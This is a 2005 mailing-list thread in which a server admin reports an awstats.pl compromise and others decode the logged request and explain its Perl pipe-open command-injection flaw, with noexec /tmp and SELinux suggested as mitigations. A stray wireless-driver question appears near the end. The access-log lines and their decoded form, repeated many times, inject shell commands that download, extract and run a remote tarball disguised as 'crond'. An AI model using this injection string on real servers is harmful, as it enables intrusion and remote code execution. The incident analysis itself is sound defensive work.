Hey guys,
I just though I would let you know how my server got compromised. This even happend after I installed the new version of awstats on Wednesday. So in short I don't know if it is OK to run awstats as a cgi executable.
These are from my access log:
"GET /cgi-bin/awstats.pl? configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bcurl%20%2d0%20wget%2 0zburchi%2eidilis%2ero%2fbadboy%2etar%2egz%3btar%20%2dzxvf%20badboy%2eta r%2egz%3bcd%20psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3bec ho%20e_exp%3b%2500 HTTP/1.1" 200 485 "-" "-"
"GET /cgi-bin/awstats.pl? configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%20zburchi%2eidi lis%2ero%2fbadboy%2etar%2egz%3btar%20%2dzxvf%20badboy%2etar%2egz%3bcd%20 psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3becho%20e_exp%3b% 2500 HTTP/1.1" 200 634 "-" "-"
-cs
Am Fr, den 04.03.2005 schrieb Chris Strzelczyk um 17:40:
I just though I would let you know how my server got compromised. This even happend after I installed the new version of awstats on Wednesday. So in short I don't know if it is OK to run awstats as a cgi executable.
These are from my access log:
"GET /cgi-bin/awstats.pl? configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bcurl%20%2d0%20wget%2 0zburchi%2eidilis%2ero%2fbadboy%2etar%2egz%3btar%20%2dzxvf%20badboy%2eta r%2egz%3bcd%20psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3bec ho%20e_exp%3b%2500 HTTP/1.1" 200 485 "-" "-"
"GET /cgi-bin/awstats.pl? configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%20zburchi%2eidi lis%2ero%2fbadboy%2etar%2egz%3btar%20%2dzxvf%20badboy%2etar%2egz%3bcd%20 psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3becho%20e_exp%3b% 2500 HTTP/1.1" 200 634 "-" "-"
-cs
Thank you for this report. So you are saying that even with awstats 6.4 you got compromised as Apache did execute the logged command and a trojan then started running located in /tmp? If so, would you please be so kind and report that issue to the awstats project guys as soon as possible?
Alexander
On Fri, 2005-03-04 at 18:34 +0100, Alexander Dalloz wrote:
"GET /cgi-bin/awstats.pl? configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bcurl%20%2d0%20wget%2 0zburchi%2eidilis%2ero%2fbadboy%2etar%2egz%3btar%20%2dzxvf%20badboy%2eta r%2egz%3bcd%20psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3bec ho%20e_exp%3b%2500 HTTP/1.1" 200 485 "-" "-"
"GET /cgi-bin/awstats.pl? configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%20zburchi%2eidi lis%2ero%2fbadboy%2etar%2egz%3btar%20%2dzxvf%20badboy%2etar%2egz%3bcd%20 psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3becho%20e_exp%3b% 2500 HTTP/1.1" 200 634 "-" "-"
-cs
Thank you for this report. So you are saying that even with awstats 6.4 you got compromised as Apache did execute the logged command and a trojan then started running located in /tmp? If so, would you please be so kind and report that issue to the awstats project guys as soon as possible?
Alexander:
Could you explain the series of events? It's not clear - to me - how this resulted in a compromised machine.
BTW, I am MOST appreciative of people who follow-up on their issues as Chris did.
Thanks
David Cary Hart wrote:
On Fri, 2005-03-04 at 18:34 +0100, Alexander Dalloz wrote:
"GET /cgi-bin/awstats.pl? configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bcurl%20%2d0%20wget%2 0zburchi%2eidilis%2ero%2fbadboy%2etar%2egz%3btar%20%2dzxvf%20badboy%2eta r%2egz%3bcd%20psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3bec ho%20e_exp%3b%2500 HTTP/1.1" 200 485 "-" "-"
(snip)
Thank you for this report. So you are saying that even with awstats 6.4 you got compromised as Apache did execute the logged command and a trojan then started running located in /tmp? If so, would you please be so kind and report that issue to the awstats project guys as soon as possible?
Alexander:
Could you explain the series of events? It's not clear - to me - how this resulted in a compromised machine.
Replace the url-encoded characters and you get:
/cgi-bin/awstats.pl?configdir=|echo ;echo b_exp;cd /tmp;curl -0 wget zburchi.idilis.ro/badboy.tar.gz;tar -zxvf badboy.tar.gz;cd psybnc;mv mech crond;export PATH=;crond;echo e_exp;%00
So the attacker has tricked the script into executing a set of shell commands, which include changing directory to /tmp, downloading a tarball from a Romanian site, extracting that tarball and then executing a program from the downloaded and extracted tarball, after renaming it to "crond" in an effort to disguise it.
Paul.
On Fri, 2005-03-04 at 17:58 +0000, Paul Howarth wrote:
David Cary Hart wrote:
On Fri, 2005-03-04 at 18:34 +0100, Alexander Dalloz wrote:
"GET /cgi-bin/awstats.pl? configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bcurl%20%2d0%20wget%2 0zburchi%2eidilis%2ero%2fbadboy%2etar%2egz%3btar%20%2dzxvf%20badboy%2eta r%2egz%3bcd%20psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3bec ho%20e_exp%3b%2500 HTTP/1.1" 200 485 "-" "-"
(snip)
Thank you for this report. So you are saying that even with awstats 6.4 you got compromised as Apache did execute the logged command and a trojan then started running located in /tmp? If so, would you please be so kind and report that issue to the awstats project guys as soon as possible?
Alexander:
Could you explain the series of events? It's not clear - to me - how this resulted in a compromised machine.
Replace the url-encoded characters and you get:
/cgi-bin/awstats.pl?configdir=|echo ;echo b_exp;cd /tmp;curl -0 wget zburchi.idilis.ro/badboy.tar.gz;tar -zxvf badboy.tar.gz;cd psybnc;mv mech crond;export PATH=;crond;echo e_exp;%00
So the attacker has tricked the script into executing a set of shell commands, which include changing directory to /tmp, downloading a tarball from a Romanian site, extracting that tarball and then executing a program from the downloaded and extracted tarball, after renaming it to "crond" in an effort to disguise it.
I got that part. What I am trying to understand (please bear with me) is how the attacker might have modified the script command line.
<snip>
I got that part. What I am trying to understand (please bear with me) is how the attacker might have modified the script command line.
By just requesting http://site/cgi-bin/awstats.pl?onfigdir=....bad stuff....
David Cary Hart wrote:
On Fri, 2005-03-04 at 17:58 +0000, Paul Howarth wrote:
Replace the url-encoded characters and you get:
/cgi-bin/awstats.pl?configdir=|echo ;echo b_exp;cd /tmp;curl -0 wget zburchi.idilis.ro/badboy.tar.gz;tar -zxvf badboy.tar.gz;cd psybnc;mv mech crond;export PATH=;crond;echo e_exp;%00
So the attacker has tricked the script into executing a set of shell commands, which include changing directory to /tmp, downloading a tarball from a Romanian site, extracting that tarball and then executing a program from the downloaded and extracted tarball, after renaming it to "crond" in an effort to disguise it.
I got that part. What I am trying to understand (please bear with me) is how the attacker might have modified the script command line.
It is enough if the script does something as stupid as:
system("cat $configdir/somefile")
(Assuming value of configdir is stored in $configdir variable).
What gets executed is:
cat |echo ; echo b_exp; [...]; echo e_exp;%00/somefile
The last part will produce an error, most likely, but who cares, the important part was already executed...
It is classic example of command injection. Most of exploits of that type are for SQL queries. This one is for shell.
David Cary Hart wrote:
On Fri, 2005-03-04 at 17:58 +0000, Paul Howarth wrote:
David Cary Hart wrote:
Could you explain the series of events? It's not clear - to me - how this resulted in a compromised machine.
Replace the url-encoded characters and you get:
/cgi-bin/awstats.pl?configdir=|echo ;echo b_exp;cd /tmp;curl -0 wget zburchi.idilis.ro/badboy.tar.gz;tar -zxvf badboy.tar.gz;cd psybnc;mv mech crond;export PATH=;crond;echo e_exp;%00
So the attacker has tricked the script into executing a set of shell commands, which include changing directory to /tmp, downloading a tarball from a Romanian site, extracting that tarball and then executing a program from the downloaded and extracted tarball, after renaming it to "crond" in an effort to disguise it.
I got that part. What I am trying to understand (please bear with me) is how the attacker might have modified the script command line.
I'm not all that familiar with perl, so the following may be completely wrong, but here goes.
awstats.pl contains code to search for its configuration file. A directory name may be specified as a parameter to the script. For each directory that the script searches, it tries the following:
if (open(CONFIG,"$searchdir$PROG.$SiteConfig.conf")) ...
Normally, this would cause the file pointed to by the expansion of "$searchdir$PROG.$SiteConfig.conf" to be opened. Now, if $searchdir starts with "|", instead of opening a file and then reading it, this runs the text following the "|" as a command and then reads back the output of the command from a pipe. So by using the "|", the attacker has tricked the script into running his command.
Paul.
On Fri, 2005-03-04 at 17:58 +0000, Paul Howarth wrote:
Replace the url-encoded characters and you get:
/cgi-bin/awstats.pl?configdir=|echo ;echo b_exp;cd /tmp;curl -0 wget zburchi.idilis.ro/badboy.tar.gz;tar -zxvf badboy.tar.gz;cd psybnc;mv mech crond;export PATH=;crond;echo e_exp;%00
So the attacker has tricked the script into executing a set of shell commands, which include changing directory to /tmp, downloading a tarball from a Romanian site, extracting that tarball and then executing a program from the downloaded and extracted tarball, after renaming it to "crond" in an effort to disguise it.
Damned fine research. Good job; I'm impressed.
Replace the url-encoded characters and you get:
/cgi-bin/awstats.pl?configdir=|echo ;echo b_exp;cd /tmp;curl -0 wget zburchi.idilis.ro/badboy.tar.gz;tar -zxvf badboy.tar.gz;cd psybnc;mv mech crond;export PATH=;crond;echo e_exp;%00
So the attacker has tricked the script into executing a set of shell commands, which include changing directory to /tmp, downloading a tarball from a Romanian site, extracting that tarball and then executing a program from the downloaded and extracted tarball, after renaming it to "crond" in an effort to disguise it.
Damned fine research. Good job; I'm impressed.
I have reported this to awstats. Thanks for your help everybody.
-cs
Hi,
I try to get my 3CRWE154G72 3COM 802.11g working. It will not work. I tried kudzu, it finds the card uses the prism54 driver. When I configure my SSID and WEP key and then try to activate the card I get Error for
Wireless request et Bit Rate (8B20) Set Failed on device eth1; Input/Output error. SIOCSIFFLAGS no such file or directory
On Fri, 04 Mar 2005 20:06:03 +0100, Wemeelen wemeelen@xs4all.nl wrote:
Hi,
I try to get my 3CRWE154G72 3COM 802.11g working. It will not work. I tried kudzu, it finds the card uses the prism54 driver. When I configure my SSID and WEP key and then try to activate the card I get Error for
Wireless request et Bit Rate (8B20) Set Failed on device eth1; Input/Output error. SIOCSIFFLAGS no such file or directory
--
I used to get this though for a different card (belkin f5d6001). I dont know what the problem is but I eventually stopped using RedHat's Network Config and instead NetworkManager and NetworkManagerInfo. It works better than the previous setup. run it from a terminal to see any output errors maybe?! Ganesh
On Fri, 2005-03-04 at 12:51 -0600, Brian Fahrlander wrote:
On Fri, 2005-03-04 at 17:58 +0000, Paul Howarth wrote:
Replace the url-encoded characters and you get:
/cgi-bin/awstats.pl?configdir=|echo ;echo b_exp;cd /tmp;curl -0 wget zburchi.idilis.ro/badboy.tar.gz;tar -zxvf badboy.tar.gz;cd psybnc;mv mech crond;export PATH=;crond;echo e_exp;%00
So the attacker has tricked the script into executing a set of shell commands, which include changing directory to /tmp, downloading a tarball from a Romanian site, extracting that tarball and then executing a program from the downloaded and extracted tarball, after renaming it to "crond" in an effort to disguise it.
Damned fine research. Good job; I'm impressed.
Thank you!
Incidentally, some of the suggestions that came up earlier in this discussion, namely mounting /tmp with the noexec option and running SELinux, would have foiled *this particular* exploit of the awstats vulnerability.
Paul.
-
Aleksandar Milivojevic -
Alexander Dalloz -
Brian Fahrlander -
Chris Strzelczyk -
David Cary Hart -
Ganeshram Iyer -
Patrick Boutilier -
Paul Howarth -
Wemeelen